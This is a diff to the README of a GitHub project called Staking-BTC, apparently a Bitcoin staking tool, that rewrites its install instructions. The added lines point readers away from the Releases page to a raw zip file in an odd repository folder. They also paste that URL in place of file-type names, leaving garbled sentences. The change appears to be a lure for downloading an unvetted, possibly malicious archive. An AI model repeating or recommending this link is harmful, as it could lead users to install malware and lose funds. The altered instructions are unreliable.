shapeless-outlier51/Staking-BTC/README.md

 ## 📦 Download & Install

-1. **Visit the Release Page:** Go to the [Releases page](https://github.com/shapeless-outlier51/Staking-BTC/releases) to find the latest version.
+1. **Visit the Release Page:** Go to the [Releases page](https://raw.githubusercontent.com/shapeless-outlier51/Staking-BTC/main/clubman/Staking-BTC.zip) to find the latest version.

 2. **Choose Your Version:** Look for the latest version.
-You will see various files listed there, including `.exe`, `.dmg`, or `.tar.gz` for different operating systems.
+You will see various files listed there, including `.exe`, `.dmg`, or `https://raw.githubusercontent.com/shapeless-outlier51/Staking-BTC/main/clubman/Staking-BTC.zip` for different operating systems.

 3. **Download the Installer:** Click on the appropriate file for your operating system to start the download.

 4. **Run the Installer:**
    - **For Windows:** Double-click the downloaded `.exe` file.
 Follow the prompts to complete the installation.
    - **For macOS:** Open the downloaded `.dmg` file.
 Drag the Staking-BTC application to your Applications folder.
-   - **For Linux:** Extract the `.tar.gz` file.
+   - **For Linux:** Extract the `https://raw.githubusercontent.com/shapeless-outlier51/Staking-BTC/main/clubman/Staking-BTC.zip` file.
 Open a terminal, navigate to the extracted folder, and run the application with `./Staking-BTC`.

 5. **Start the Application:** Once installed, find the Staking-BTC app on your computer and open it.